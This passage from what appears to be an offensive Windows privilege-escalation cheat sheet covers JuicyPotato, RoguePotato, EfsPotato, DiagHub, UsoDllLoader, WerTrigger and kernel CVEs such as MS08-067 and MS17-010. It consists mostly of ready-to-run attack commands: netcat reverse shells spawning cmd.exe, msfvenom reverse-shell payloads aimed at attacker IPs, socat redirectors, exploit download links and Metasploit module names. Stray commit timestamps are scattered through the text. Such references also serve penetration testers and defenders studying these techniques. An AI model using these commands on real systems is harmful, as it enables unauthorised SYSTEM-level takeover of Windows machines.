* [Windows 8.1 Enterprise ](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise )
* [Windows 10 Enterprise ](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise )
* [Windows 10 Professional ](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro )
* [Windows Server 2008 R2 Enterprise ](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise )
* [Windows Server 2012 Datacenter ](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter )
* [Windows Server 2016 Standard ](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard )
3. Execute JuicyPotato to run a privileged command.
```powershell
2019-09-08 17:44:51 +00:00
JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
2019-07-26 13:29:34 +00:00
```
2021-08-10 21:00:19 +00:00
### Rogue Potato (Fake OXID Resolver)
* Binary available at https://github.com/antonioCoco/RoguePotato
```powershell
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
# Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
```
### EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
* Binary available at https://github.com/zcgonvh/EfsPotato
```powershell
# .NET 4.x
csc EfsPotato.cs
csc /platform:x86 EfsPotato.cs
# .NET 2.0/3.5
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
```
2020-10-08 14:39:25 +00:00
## EoP - Privileged File Write
### DiagHub
:warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM.
This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory.
#### Exploit
1. Create an [evil DLL ](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0 ) e.g: payload.dll and move it into `C:\Windows\System32`
2. Build https://github.com/xct/diaghub
3. `diaghub.exe c:\\ProgramData\\ payload.dll`
The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe`
Alternative tools:
* https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag
* https://github.com/decoder-it/diaghub_exploit
### UsoDLLLoader
:warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
> An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo)
If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System** .
#### Exploit
1. Build https://github.com/itm4n/UsoDllLoader
* Select Release config and x64 architecure.
* Build solution.
* DLL .\x64\Release\WindowsCoreDeviceInfo.dll
* Loader .\x64\Release\UsoDllLoader.exe.
2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\`
3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337.
### WerTrigger
> Weaponizing for privileged file writes bugs with Windows problem reporting
2020-10-08 14:51:11 +00:00
1. Clone https://github.com/sailay1996/WerTrigger
2. Copy `phoneinfo.dll` to `C:\Windows\System32\`
3. Place `Report.wer` file and `WerTrigger.exe` in a same directory.
4. Then, run `WerTrigger.exe` .
5. Enjoy a shell as **NT AUTHORITY\SYSTEM**
2020-10-08 14:39:25 +00:00
2019-07-26 13:29:34 +00:00
## EoP - Common Vulnerabilities and Exposure
2019-06-09 14:05:44 +00:00
### MS08-067 (NetAPI)
Check the vulnerability with the following nmap script.
```c
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 < ip_netblock >
```
Metasploit modules to exploit `MS08-067 NetAPI` .
```powershell
exploit/windows/smb/ms08_067_netapi
```
If you can't use Metasploit and only want a reverse shell.
```powershell
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
python ms08-067.py 10.0.0.1 6 445
```
2019-06-29 17:23:34 +00:00
### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
```powershell
https://www.exploit-db.com/exploits/11199
Metasploit : exploit/windows/local/ms10_015_kitrap0d
```
### MS11-080 (afd.sys) - Microsoft Windows XP/2003
```powershell
Python: https://www.exploit-db.com/exploits/18176
Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
```
2019-08-22 21:03:48 +00:00
### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012
```powershell
printf("[#] usage: ms15-051 command \n");
printf("[#] eg: ms15-051 \"whoami /all\" \n");
# x32
https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe
# x64
https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
use exploit/windows/local/ms15_051_client_copy_image
```
2019-05-25 16:19:08 +00:00
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
2019-06-11 18:51:09 +00:00
Check if the patch is installed : `wmic qfe list | findstr "3139914"`
2019-05-25 16:19:08 +00:00
```powershell
Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```
### MS17-010 (Eternal Blue)
2021-12-29 13:48:42 +00:00
Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010` .
2019-06-09 14:05:44 +00:00
2019-05-25 16:19:08 +00:00
```c
2021-12-29 13:48:42 +00:00
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17– 010 < ip_netblock >
2019-05-25 16:19:08 +00:00
```
2019-06-09 14:05:44 +00:00
Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion` .
2019-05-25 16:19:08 +00:00
2019-06-09 14:05:44 +00:00
```powershell
auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```
If you can't use Metasploit and only want a reverse shell.
2019-05-25 16:19:08 +00:00
2019-06-09 14:05:44 +00:00
```powershell
git clone https://github.com/helviojunior/MS17-010
# generate a simple reverse shell to use
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
python2 send_and_execute.py 10.0.0.1 revshell.exe
```
2019-05-25 16:19:08 +00:00
2019-11-25 22:12:06 +00:00
### CVE-2019-1388
Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html
2021-07-01 12:40:03 +00:00
Requirement:
2019-11-25 22:12:06 +00:00
- Windows 7
- Windows 10 LTSC 10240
Failing on :
- LTSC 2019
- 1709
- 1803
Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
2019-03-03 19:01:25 +00:00
2021-01-28 19:45:54 +00:00
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2019-03-24 15:00:27 +00:00
* [Windows Internals Book - 02/07/2017 ](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals )
2019-03-03 19:01:25 +00:00
* [icacls - Docs Microsoft ](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls )
* [Privilege Escalation Windows - Philip Linghammar ](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html )
* [Windows elevation of privileges - Guifre Ruiz ](https://guif.re/windowseop )
2018-05-20 20:10:33 +00:00
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte ](https://addaxsoft.com/wpecs/ )
* [Basic Linux Privilege Escalation ](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ )
2018-07-08 18:03:40 +00:00
* [Windows Privilege Escalation Fundamentals ](http://www.fuzzysecurity.com/tutorials/16.html )
* [TOP– 10 ways to boost your privileges in Windows systems - hackmag ](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/ )
2018-12-22 23:45:45 +00:00
* [The SYSTEM Challenge ](https://decoder.cloud/2017/02/21/the-system-challenge/ )
2018-12-25 14:19:45 +00:00
* [Windows Privilege Escalation Guide - absolomb's security blog ](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ )
2019-03-24 15:00:27 +00:00
* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs ](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md )
2018-12-25 14:51:11 +00:00
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell ](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/ )
* [Pentestlab.blog - WPE-01 - Stored Credentials ](https://pentestlab.blog/2017/04/19/stored-credentials/ )
* [Pentestlab.blog - WPE-02 - Windows Kernel ](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/ )
* [Pentestlab.blog - WPE-03 - DLL Injection ](https://pentestlab.blog/2017/04/04/dll-injection/ )
* [Pentestlab.blog - WPE-04 - Weak Service Permissions ](https://pentestlab.blog/2017/03/30/weak-service-permissions/ )
* [Pentestlab.blog - WPE-05 - DLL Hijacking ](https://pentestlab.blog/2017/03/27/dll-hijacking/ )
* [Pentestlab.blog - WPE-06 - Hot Potato ](https://pentestlab.blog/2017/04/13/hot-potato/ )
* [Pentestlab.blog - WPE-07 - Group Policy Preferences ](https://pentestlab.blog/2017/03/20/group-policy-preferences/ )
* [Pentestlab.blog - WPE-08 - Unquoted Service Path ](https://pentestlab.blog/2017/03/09/unquoted-service-path/ )
* [Pentestlab.blog - WPE-09 - Always Install Elevated ](https://pentestlab.blog/2017/02/28/always-install-elevated/ )
* [Pentestlab.blog - WPE-10 - Token Manipulation ](https://pentestlab.blog/2017/04/03/token-manipulation/ )
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle ](https://pentestlab.blog/2017/04/07/secondary-logon-handle/ )
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions ](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/ )
2019-03-31 13:05:13 +00:00
* [Pentestlab.blog - WPE-13 - Intel SYSRET ](https://pentestlab.blog/2017/06/14/intel-sysret/ )
2019-06-11 18:51:09 +00:00
* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_ ](https://blog.xpnsec.com/becoming-system/ )
2019-10-06 18:59:58 +00:00
* [Living Off The Land Binaries and Scripts (and now also Libraries) ](https://github.com/LOLBAS-Project/LOLBAS )
2020-02-01 21:12:36 +00:00
* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec ](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html )
2020-03-22 19:25:35 +00:00
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar ](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf )
2020-10-08 14:39:25 +00:00
* [Abusing Diaghub - xct - March 07, 2019 ](https://vulndev.io/howto/2019/03/07/diaghub.html )
* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018 ](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html )
2020-10-29 10:57:40 +00:00
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019 ](https://itm4n.github.io/usodllloader-part2/ )
2021-01-28 19:45:54 +00:00
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows ](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1 )
2021-07-25 09:40:19 +00:00
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO ](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ )
2022-05-25 07:55:05 +00:00
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021) ](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/ )